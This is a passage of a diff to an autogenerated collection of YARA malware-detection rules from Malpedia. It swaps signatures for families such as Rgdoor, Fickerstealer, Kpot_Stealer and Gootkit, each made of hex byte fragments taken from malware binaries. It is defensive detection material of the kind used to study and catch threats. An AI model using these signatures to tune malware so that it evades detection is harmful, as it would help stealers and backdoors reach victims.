c6459374 } - $sequence_4 = { 56 8d45ec 50 8d45f0 50 6813000020 } - $sequence_5 = { 894df4 8955fc f7c60000ffff 7513 81e6ffff0000 2b7010 } - $sequence_6 = { 03c6 ebea 56 8b742410 57 } - $sequence_7 = { 58 668945f8 6a32 58 668945fa 33c0 668945fc } - $sequence_8 = { ff15???????? a3???????? 3bc6 0f84c0000000 53 8d4df4 } - $sequence_9 = { 50 ff15???????? 83c414 56 b80013e084 50 56 } + $sequence_0 = { 03f2 eb5c 8b45f4 8b0c85f01f4300 f644190448 7437 } + $sequence_1 = { 720f 8b06 5f c60000 8bc6 } + $sequence_2 = { 83e908 8d7608 660fd60f 8d7f08 8b048db8734000 ffe0 f7c703000000 } + $sequence_3 = { e8???????? 51 51 53 8bd9 33c0 8945f0 } + $sequence_4 = { e8???????? 83c410 3bc3 75cf 0fb644240f e9???????? c74424340f000000 } + $sequence_5 = { 80fb5a 7e53 80fb2d 744e 80fb2e } + $sequence_6 = { 8b5df4 8b7df0 33f6 8bce 8b75fc } + $sequence_7 = { 7204 8b1e eb02 8bde 8b450c 33d2 8b4d08 } + $sequence_8 = { 59 50 8d45d0 8bce 50 e8???????? 837da010 } + $sequence_9 = { 53 50 68???????? 53 ff15???????? 8d4de8 c745e868747470 } condition: - 7 of them and filesize <174080 + 7 of them and filesize <450560 } -rule MALPEDIA_Win_Unidentified_104_Auto : FILE +rule MALPEDIA_Win_Rgdoor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e8a556d0-f78d-5a2d-8efe-d7e4f2e8c4f0" + id = "4140ffd6-129c-5510-99e3-ad151c975d1e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_104" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_104_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rgdoor_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "e638b20b38ac304bb33832304ee0b9b7e6ee0e08465f3d2f98dbc6a372f89d7d" + logic_hash = "bf6d408b52f68286adc8c589928141fb2586a77ca6ee142e58e02ec6b6fb2c0d" score = 75 quality = 75 tags = "FILE" @@ -148904,32 +151705,32 @@ rule MALPEDIA_Win_Unidentified_104_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4c8d0d20070100 33c9 4c8d050f070100 488d1510070100 e8???????? 4885c0 } - $sequence_1 = { 4c03e9 4d33cd 498bd9 49c1e918 48c1e328 4933d9 4803c3 } - $sequence_2 = { 410fb6401b 4c0bc8 410fb6401a 49c1e108 4c0bc8 49c1e104 4c03c9 } - $sequence_3 = { 48c1e128 4933c9 4c8b8c2490000000 498b8180000000 4803c1 4803e8 4c33c5 } - $sequence_4 = { 4883fa10 0f8288000000 48ffc2 488b4dc7 488bc1 483bd7 728f } - $sequence_5 = { 415d 415c 5f 5e 5d c3 488d5ed8 } - $sequence_6 = { 418848fe c1e810 c1e918 418800 41884801 4d8d4004 4983e901 } - $sequence_7 = { e8???????? 33c0 4883c420 5b c3 8bd3 488bc8 } - $sequence_8 = { 49c1e330 4c33da 4903f3 4889b424a0000000 4833ce 488b742418 488bd1 } - $sequence_9 = { 7230 48ffc2 488b8dc0000000 488bc1 4881fa00100000 7215 } + $sequence_0 = { 7512 448bfb 448be3 4c8d35d4870100 e9???????? bd01000000 ba98000000 } + $sequence_1 = { 488bce eb9d 33db 41b803010000 488bd6 e8???????? } + $sequence_2 = { 4533f6 eb0e 4983ceff 90 49ffc6 42381c32 75f7 } + $sequence_3 = { e8???????? b802000000 eb30 48837dd010 720a 488b4db8 } + $sequence_4 = { e8???????? 488d05554b0200 4889442458 488d15398d0200 488d4c2458 } + $sequence_5 = { e8???????? 83f8ff 0f8490050000 80bc247001000077 750a 8bde 448be6 } + $sequence_6 = { 8938 e8???????? 488d1d8b390200 4885c0 7404 } + $sequence_7 = { 4883ec20 488d3d8bf90100 48393d???????? 742b } + $sequence_8 = { 48837db010 480f435598 41b822000000 488d8de8000000 e8???????? 4885c0 488b85e0000000 } + $sequence_9 = { 488bce ff15???????? 8bf8 eb25 488b8c2490000000 e9???????? 48895c2420 } condition: - 7 of them and filesize <263168 + 7 of them and filesize <475136 } -rule MALPEDIA_Win_Hawkball_Auto : FILE +rule MALPEDIA_Win_Fishmaster_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e8db5e2d-29c9-5590-a712-0f60cd9571dc" + id = "ac4d1a12-e633-54d1-8952-cc6fd81de034" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkball" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hawkball_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fishmaster" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fishmaster_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "781a6bce01e178f537c586fc2b1e607c4503cf63fe51435a8db976da2766e5fa" + logic_hash = "ee895ce428e3021476e31fc5a4cbc7a0e07349c7fde3100efce8681f3e034d54" score = 75 quality = 75 tags = "FILE" @@ -148943,32 +151744,32 @@ rule MALPEDIA_Win_Hawkball_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83780c00 7506 33c0 8be5 } - $sequence_1 = { 53 e8???????? 037dfc 83c40c 81ffffff0300 } - $sequence_2 = { 0f84c6000000 6a04 8d442418 c744241860ea0000 50 6a06 57 } - $sequence_3 = { 53 ff15???????? ff742414 8b35???????? ffd6 53 } - $sequence_4 = { 85c9 746d 837dfc28 7d13 6b55fc05 69c2e8030000 } - $sequence_5 = { 50 ff15???????? 897001 c600ff c7400500000000 } - $sequence_6 = { b9???????? e8???????? a3???????? 833d????????00 740b 8b0d???????? } - $sequence_7 = { 837dfc28 7d13 6b55fc05 69c2e8030000 50 } - $sequence_8 = { 7405 8d4a10 eb47 b911000000 } - $sequence_9 = { 8be5 5d c3 6a59 ff15???????? 85c0 } + $sequence_0 = { 4883f81f 7736 498bc8 e8???????? 48c7471000000000 } + $sequence_1 = { e8???????? 488bc3 4c8b4318 4983f810 } + $sequence_2 = { 7203 498b06 40883c08 c644080100 e9???????? 440fb6cf } + $sequence_3 = { 488d156e220000 488bcb ff15???????? 488d156e220000 488bcb ff15???????? 4c8be8 } + $sequence_4 = { 4157 4883ec60 488bfa 488bd9 33f6 897098 488970b0 } + $sequence_5 = { 48837f1810 7203 488b07 488d4c2438 } + $sequence_6 = { 0fb65310 8d42ff 3cfd 7718 88940d84000000 4883c314 } + $sequence_7 = { 46383400 75f7 488d9580000000 488d4d20 e8???????? } + $sequence_8 = { 480f434c2440 420fb6440803 4288440904 488d442440 48837c245810 480f43442440 488d4c2440 } + $sequence_9 = { 4c8b45f8 488d15ce200000 488bcf ff15???????? 488bf8 4c89742430 4489742428 } condition: - 7 of them and filesize <229376 + 7 of them and filesize <812032 } -rule MALPEDIA_Win_Klrd_Auto : FILE +rule MALPEDIA_Win_Atharvan_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f2ac53cd-82a8-55ea-badd-f6f1aae58f93" + id = "90143155-ec04-5a1a-8f1d-cad8e690d20c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.klrd_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atharvan" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.atharvan_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "0fc6f030ea4bb49d87359f96c6eceeeaeffbdd94bdee42030f76f2d7ec66a19a" + logic_hash = "4ab12aee6394d0021e81333c85382f01af297ccebc032a8d7f39b0ec61d7b92e" score = 75 quality = 75 tags = "FILE" @@ -148982,79 +151783,73 @@ rule MALPEDIA_Win_Klrd_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d85fcefffff 50 e8???????? 59 50 } - $sequence_1 = { 8d85fcefffff 50 57 ff15???????? 57 ff15???????? } - $sequence_2 = { e8???????? 59 50 8d85fcefffff 50 57 } - $sequence_3 = { 3c00 0f8485020000 3c03 0f847d020000 3c09 0f8475020000 3c08 } - $sequence_4 = { c685c0fdffff00 68ff000000 6a00 8d85c1fdffff 50 e8???????? 83c40c } - $sequence_5 = { 59 59 ff7510 ff750c ff7508 ff35???????? ff15???????? } - $sequence_6 = { ebcc 8a85e7feffff 8885acfcffff 80bdacfcffff08 742f } - $sequence_7 = { 56 56 6a04 56 56 68000000c0 68???????? } - $sequence_8 = { 59 8d7dec f3a5 8b45ec 25ff000000 8885e7feffff 3c00 } - $sequence_9 = { ffb5b0fcffff ff15???????? 8985c8feffff 83bdc8feffff00 7515 ff15???????? } + $sequence_0 = { 4c8d05ee7a0000 488b9540070000 488bce e8???????? 85c0 750b eb9e } + $sequence_1 = { 423a9401d4ab0100 7566 488b03 48ffc1 8a10 48ffc0 488903 } + $sequence_2 = { 498784f6105c0200 4885c0 7409 488bcb ff15???????? 4885db } + $sequence_3 = { 8d0480 03c0 442be8 0f84cffbffff 418d45ff 8b848228aa0100 } + $sequence_4 = { 750d 4c8bc6 e8???????? e9???????? 4c8bce 4c8d05e1dd0100 } + $sequence_5 = { 498bcf ff15???????? 498bcf ff15???????? 488b4c2440 4833cc e8???????? } + $sequence_6 = { b903000000 4c8d0564a10000 488d1565a10000 e8???????? } + $sequence_7 = { 498bcf ff15???????? 488bd8 eb02 33db 4c8d3d028cffff 4885db } + $sequence_8 = { 7528 48833d????????00 741e 488d0d943e0100 e8???????? 85c0 } + $sequence_9 = { 83f801 751f 488b0d???????? 488d1d356c0100 483bcb 740c } condition: - 7 of them and filesize <40960 + 7 of them and filesize <348160 } -rule MALPEDIA_Win_Ksl0T_Auto : FILE +rule MALPEDIA_Win_Malumpos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5a4c8dc6-6c96-5c41-9019-3d4bc785a54b" + id = "011d5980-db12-575d-b128-68c240971c82" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ksl0t_auto.yar#L1-L172" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.malumpos_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "5f184f0ae6eb14c42a9f8143b74f6a69a5bb90e2ed5eff63faec19a839c8988a" + logic_hash = "1d9a68f5cdfadc8f79ba4d8f4695a01ec544e2c566edbd712a7ed582b4a68976" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" - - strings: - $sequence_0 = { ff15???????? 83c40c 3bf7 7515 ff15???????? } - $sequence_1 = { c68424a100000039 c68424a200000039 888c24a3000000 c684248000000026 } - $sequence_2 = { c684241001000006 88842411010000 889c2412010000 c684241301000013 } - $sequence_3 = { 68???????? 8d8d00080000 51 ff15???????? 8d9500080000 52 } - $sequence_4 = { ff942418040000 4c8bd8 488b842420040000 4c899878010000 488d542468 } - $sequence_5 = { c68424f600000034 c68424f700000038 c68424f800000030 c68424f900000002 c68424fa00000055 c644245813 c64424593c } - $sequence_6 = { c684245a01000021 c684245b01000018 c684245c01000030 c684245d01000026 c684245e01000026 c684245f01000034 } - $sequence_7 = { 4881c294000000 41b801000000 488d0dd7e60000 ff15???????? } - $sequence_8 = { 8d94241c030000 52 53 89466c ffd7 894670 } - $sequence_9 = { 3bcf 7518 81fa00010000 7510 } - $sequence_10 = { c684248800000002 c684248900000055 c684241801000000 c68424190100003b c684241a0100003d c684241b0100003a } - $sequence_11 = { 84c0 745a 68???????? 68???????? ff15???????? 68???????? 68???????? } - $sequence_12 = { 488bce 488905???????? ff15???????? 488bc8 e8???????? 488d1592280000 488bce } - $sequence_13 = { ff15???????? 8bf0 6800020000 57 8d95000d0000 52 ff15???????? } - $sequence_14 = { 7509 488d0de2450000 eb02 33c9 e8???????? 4883c438 c3 } - $sequence_15 = { c68424f801000038 c68424f901000034 c68424fa01000039 c68424fb01000039 c68424fc0100003a } + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" + + strings: + $sequence_0 = { 85f6 7907 0d80000000 eb27 } + $sequence_1 = { 53 50 c78500fdffff07000100 895d4c 895dcc e8???????? } + $sequence_2 = { 59 8d45cc 50 ff15???????? 6a44 } + $sequence_3 = { 0f1f00 0f1f00 0f1f00 0f1f00 6a72 } + $sequence_4 = { 3bc8 0f86f1feffff ff770c 50 e8???????? } + $sequence_5 = { 7805 0500000000 57 3500000000 } + $sequence_6 = { 8a0432 3c3d 7506 8365fc00 eb0d } + $sequence_7 = { e8???????? 68???????? a3???????? ffd0 810d????????00200000 be???????? c745f468e50300 } + $sequence_8 = { 6683f300 55 51 7204 } + $sequence_9 = { 8d4520 50 ff15???????? 8d4520 } condition: - 7 of them and filesize <196608 + 7 of them and filesize <542720 } -rule MALPEDIA_Win_Purplefox_Auto : FILE +rule MALPEDIA_Win_Fickerstealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "864146ba-a135-5d92-a900-c7434a0b6e81" + id = "45d62189-24df-5dae-af5a-78b51fda916c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.purplefox_auto.yar#L1-L376" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fickerstealer_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "2241b5e41c5930d16a914d761ccbb07709436fc80bf5297a0da02f1f8d89a59e" + logic_hash = "fe62eb4bdda7768c5d67489e8496ef31433ebe8da6a7c001c0177fb4671588ff" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -149066,62 +151861,32 @@ rule MALPEDIA_Win_Purplefox_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8945ec 8d45f0 50 8d4dd8 8d55f8 51 } - $sequence_1 = { d2de feca 28c3 80d262 9c } - $sequence_2 = { 66f7d9 c1e810 52 66c1d908 0f9fc5 } - $sequence_3 = { 8918 e8???????? 4c8d15a7c70000 4885c0 7404 4c8d5010 8bcb } - $sequence_4 = { 8d45f8 50 6a00 6a00 c745f800000000 } - $sequence_5 = { 488b8d08040000 488d442470 4d8b00 4533c9 ba00000100 4889742428 48899c24f0040000 } - $sequence_6 = { ff15???????? 488bc8 ff15???????? 488d1528460000 488bce } - $sequence_7 = { 8b04c52cbb4000 5d c3 8bff 55 8bec } - $sequence_8 = { ffd6 83c410 8d542424 52 8d442410 e8???????? } - $sequence_9 = { 0f1005???????? f20f100d???????? 4889bc24c8000000 33ff } - $sequence_10 = { 51 0f9dc3 8b742404 685af85bca 8b7c240c } - $sequence_11 = { 56 57 68???????? e8???????? 83c404 6a00 6a00 } - $sequence_12 = { cf b94523340a e8???????? 06 } - $sequence_13 = { b614 dc1a 7038 1f a5 } - $sequence_14 = { 415d 415c 5f c3 4889742478 488bb42490000000 } - $sequence_15 = { 8d4df4 51 52 56 6a00 50 } - $sequence_16 = { 488b4238 48894108 488b4a50 4885c9 } - $sequence_17 = { e8???????? 8dbddcfdffff e8???????? 8dbddcfdffff c745fcffffffff } - $sequence_18 = { 6685c9 75f1 8d85f8fdffff 56 33f6 8d5002 } - $sequence_19 = { 8944241c 52 8d44241c 50 } - $sequence_20 = { 4803d8 41b800040000 48899d00040000 e8???????? e9???????? 488b4c2470 ff15???????? } - $sequence_21 = { 448bcf 4889442420 e8???????? 8bc7 488d4dd0 33d2 } - $sequence_22 = { 8b703c 66f7da 0fbae603 0fca 20c6 01c6 42 } - $sequence_23 = { 4883c308 483bdf 72ed 48833d????????00 741f 488d0d36c60000 e8???????? } - $sequence_24 = { 57 68???????? 68???????? bf00500000 ff15???????? 50 ff15???????? } - $sequence_25 = { ff15???????? 488d542450 488d0d96b10000 e8???????? } - $sequence_26 = { 3bf3 7d1e 8b4de8 ff15???????? 8b4df8 51 } - $sequence_27 = { 52 ffd3 85c0 7507 b802000000 eb1a } - $sequence_28 = { 9c 368810 c6042413 60 } - $sequence_29 = { 668b460c 8b5508 6a01 668945e4 } - $sequence_30 = { 4533c0 33d2 4489b424a0000000 4889442420 } - $sequence_31 = { a1???????? a3???????? a1???????? c705????????bb454000 8935???????? } - $sequence_32 = { e8???????? 83c408 33ff eb23 68???????? } - $sequence_33 = { 4885c0 743f 488b0d???????? 488d1551970000 } - $sequence_34 = { 8b1d???????? 68???????? 50 ffd3 85c0 750c 8b4f08 } - $sequence_35 = { c744246800010000 488bf9 4889742460 89742458 89742450 4889742448 } - $sequence_36 = { 488d0de4d20000 483bd9 723e 488d0568d60000 483bd8 7732 488bd3 } - $sequence_37 = { 48ffce 75a3 8b4504 03c5 8be8 833800 } - $sequence_38 = { 897c2404 e8???????? e8???????? 8d64242c 0f850a000000 660fb6d8 } - $sequence_39 = { 56 57 4883ec50 8bc9 488d942480000000 ff15???????? } + $sequence_0 = { 8b55c8 897150 895154 8b75cc 8b55d0 897158 89515c } + $sequence_1 = { ba???????? 0f2840f0 0f2808 0f298424a0040000 0f294910 0f2901 6a00 } + $sequence_2 = { c1e104 85c0 f20f10840b90000000 f20f108c0b98000000 f20f118c2488000000 f20f11842480000000 f20f10442450 } + $sequence_3 = { c1ea04 85d2 0f44d1 0f44f0 89d1 c1e902 6afe } + $sequence_4 = { 8b3e e8???????? 84c0 7404 c6470401 8b06 8b08 } + $sequence_5 = { 89d3 8954241c 897c2420 c744241801000000 89f1 e8???????? 3c0f } + $sequence_6 = { f20f114d9c f20f115594 7514 31d2 8d4ddc 42 e8???????? } + $sequence_7 = { e9???????? 8d7c2448 89f9 e8???????? 833f01 0f85ed000000 } + $sequence_8 = { 56 53 57 ff750c 50 e8???????? 83c424 } + $sequence_9 = { 898d40feffff 89f9 8985d4feffff 8b8570ffffff 8985d8feffff 8b4588 8985dcfeffff } condition: - 7 of them and filesize <1983488 + 7 of them and filesize <598016 } -rule MALPEDIA_Win_Croxloader_Auto : FILE +rule MALPEDIA_Win_Orangeade_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4c54923c-05d0-5bcf-b03e-4330bb61dd7a" + id = "a790e493-320f-57de-9b62-d13796c94676" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.croxloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.croxloader_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orangeade" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.orangeade_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "c88e829bb61a0a12fc0c92bdb08f88ad90c78cd22176146404aa71918162c3b2" + logic_hash = "bc9cfd6680cc4f32cd41e9edf43afa43b54975c598906df96ea95e31fa6c1612" score = 75 quality = 75 tags = "FILE" @@ -149135,32 +151900,32 @@ rule MALPEDIA_Win_Croxloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488d0dd0590100 eb0c 83f901 750d 488d0dda590100 } - $sequence_1 = { 498b84ff18910100 90 493bc6 0f84eb000000 4885c0 } - $sequence_2 = { 4883ec20 488364243800 4c8d442438 8bd9 488d157aa80000 33c9 } - $sequence_3 = { 4b8b84e010970100 42804cf03d04 38558f ebcc ff15???????? } - $sequence_4 = { 488d0d09520100 e8???????? 488d0d05520100 e8???????? 488b0d???????? e8???????? 488b0d???????? } - $sequence_5 = { 4883f9ff 7406 ff15???????? 48832300 4883c308 488d05fc240100 } - $sequence_6 = { 4c8d0562eb0000 83e23f 488bcb 48c1f906 488d14d2 498b0cc8 8064d138fd } - $sequence_7 = { 8938 e8???????? 488d1db32f0100 4885c0 } - $sequence_8 = { 4c8d05c9890100 ba920e0332 b95595db6d e8???????? 4c8d05038a0100 ba436a459e b9edb0da1e } - $sequence_9 = { 3b1d???????? 736a 488bc3 4c8d35de000100 83e03f 488bf3 48c1fe06 } + $sequence_0 = { 8bb42428050000 50 8bce e8???????? c744241001000000 } + $sequence_1 = { 50 8d942470020000 51 52 ff15???????? } + $sequence_2 = { f3ab 66ab aa 8d842468020000 50 } + $sequence_3 = { 6881000000 6a00 c784249428010000000000 ff15???????? 8bf0 56 } + $sequence_4 = { aa b93f000000 33c0 8dbc2465010000 } + $sequence_5 = { 8d4c2424 c684248828010002 e8???????? 8d4c2410 c684248828010001 e8???????? 8d4c2414 } + $sequence_6 = { b93f000000 33c0 8d7c2479 885c2478 f3ab } + $sequence_7 = { 68???????? 8d4c2410 e8???????? 68???????? 6884000000 53 ff15???????? } + $sequence_8 = { e8???????? 83c404 8d4c2424 c684248828010002 } + $sequence_9 = { 50 8d4c2410 c684248400000001 e8???????? } condition: - 7 of them and filesize <241664 + 7 of them and filesize <139264 } -rule MALPEDIA_Win_Transbox_Auto : FILE +rule MALPEDIA_Win_Kpot_Stealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6493b67c-879c-5d38-8ca0-5969cb4aa6f0" + id = "e45631fb-3fb5-58e0-9b9b-6b34d42ff6ce" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.transbox" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.transbox_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kpot_stealer_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "d97e3f1924a5eeca38d9aa110b067c359caad44c72bb11cebc9ddfa66ee7e3d6" + logic_hash = "16f05178ea617d4330175d94df8b79c29f673ce62148ecbf2153af87111da7a0" score = 75 quality = 75 tags = "FILE" @@ -149174,32 +151939,32 @@ rule MALPEDIA_Win_Transbox_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 64a300000000 eb24 8b048d90b60110 41 50 890d???????? ff15???????? } - $sequence_1 = { 33c9 83c414 85c0 0f9fc1 8bc1 8b4dfc 33cd } - $sequence_2 = { 8d4e04 c706???????? 832100 83610400 51 50 ff15???????? } - $sequence_3 = { e9???????? 55 8bec 56 8b7508 57 bf???????? } - $sequence_4 = { f7fb 56 8bf0 bbe0077e00 8bc3 2bc6 83f801 } - $sequence_5 = { f77dfc 50 51 e8???????? 83c40c 69c708020000 5f } - $sequence_6 = { 8bbdbcd3ffff 53 6a01 8d8d28e1ffff 885dfc } - $sequence_7 = { 8d85e8fdffff 6808020000 895dfc 53 50 89bddcfdffff 899de4fdffff } - $sequence_8 = { 33c9 8985dcfcffff 51 50 } - $sequence_9 = { 8d85f8faffff 50 e8???????? 8bd0 8b02 85c0 7402 } + $sequence_0 = { 03c6 50 ff75f4 e8???????? 59 59 8d4df8 } + $sequence_1 = { 0bce 8bc1 c1e804 33c2 250f0f0f0f 33d0 } + $sequence_2 = { 55 8bec ff7508 ff15???????? 83f8ff 7409 a8a7 } + $sequence_3 = { 8b4604 8b5df4 03d2 8d445802 e8???????? } + $sequence_4 = { 85c0 7427 8b45f8 03c6 50 } + $sequence_5 = { 57 8bf8 8b4518 0fb67005 } + $sequence_6 = { 8b45f4 c1e918 884b07 8945fc 8b45f0 83c308 ff4dec } + $sequence_7 = { 5e 5b c9 c3 0fb70f 6685c9 7440 } + $sequence_8 = { a8a7 7405 33c0 40 5d } + $sequence_9 = { 8bc1 c1e810 884306 8b45f4 } condition: - 7 of them and filesize <288768 + 7 of them and filesize <219136 } -rule MALPEDIA_Win_Keymarble_Auto : FILE +rule MALPEDIA_Win_Hi_Zor_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "25735efc-9b7e-5c4e-843b-1618e0690062" + id = "3dc62db9-3a05-5424-a3c8-d6fd9e595782" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.keymarble_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hi_zor_rat_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "6744b9f4fc70c631928ab5473ea2bd7eecc2671462bf651b9238352600b5d250" + logic_hash = "3acb0fc19d1323e3198577328eeef1259397f6589eae60512b85396f5cbd245b" score = 75 quality = 75 tags = "FILE" @@ -149213,34 +151978,34 @@ rule MALPEDIA_Win_Keymarble_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 50 e8???????? 83c404 56 6a40 } - $sequence_1 = { ff15???????? 50 e8???????? 83c404 56 6a40 ff15???????? } - $sequence_2 = { e8???????? 83c404 56 6a40 ff15???????? } - $sequence_3 = { 83c404 e8???????? 8d3470 81e6ffffff7f } - $sequence_4 = { 50 ff15???????? 68???????? 6a40 } - $sequence_5 = { 83c408 85c0 7407 bb7a452301 } - $sequence_6 = { 50 e8???????? 83c404 56 6a40 } - $sequence_7 = { ff15???????? 50 ff15???????? 68???????? 6a40 } - $sequence_8 = { 83c404 56 6a40 ff15???????? } - $sequence_9 = { 6a00 6a03 6800000040 57 ffd6 } + $sequence_0 = { c644303080 8b4e24 83e13f 80f937 7614 8bc6 e8???????? } + $sequence_1 = { ff15???????? 8b4d08 57 8bf0 51 56 } + $sequence_2 = { e8???????? 8b1d???????? 83c418 6804010000 8d8df4fdffff 51 } + $sequence_3 = { 23da 8bfa 8b5014 f7d7 } + $sequence_4 = { 8b5818 8db41e604b0000 c1e610 c1ef10 0bfe } + $sequence_5 = { 037018 f7d2 8975f8 897014 8bfa 0b55f8 } + $sequence_6 = { 57 51 50 8945f4 e8???????? 8b450c } + $sequence_7 = { 50 51 e8???????? 83c424 893e 5f 5e } + $sequence_8 = { ffd6 8b55ec 83c404 52 ffd6 83c404 } + $sequence_9 = { 83c40c 6a00 8d450c 50 6800e00100 8d4608 50 } condition: - 7 of them and filesize <1146880 + 7 of them and filesize <73728 } -rule MALPEDIA_Win_Gootkit_Auto : FILE +rule MALPEDIA_Win_Heyoka_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "50659808-58ce-5271-8f0d-8034418275c7" + id = "86cada76-df01-530f-8812-d25a9cd3eeea" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gootkit_auto.yar#L1-L327" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heyoka" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.heyoka_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "a2cf121428fb2173dc07901e77686f48303de5dc8bfa584df38195e7a090200e" + logic_hash = "a93bcd2aa0b2cb88631752f25ba4416145dab56370097ba7d811f589f6be863b" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -149252,60 +152017,34 @@ rule MALPEDIA_Win_Gootkit_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a04 6800300000 57 6a00 897df8 } - $sequence_1 = { 50 ff75fc ffd7 33c9 c745f804000000 41 33f6 } - $sequence_2 = { 8945f0 85c0 7435 8b01 ff75f4 03c3 } - $sequence_3 = { e8???????? 8bd8 85db 0f45f3 33c0 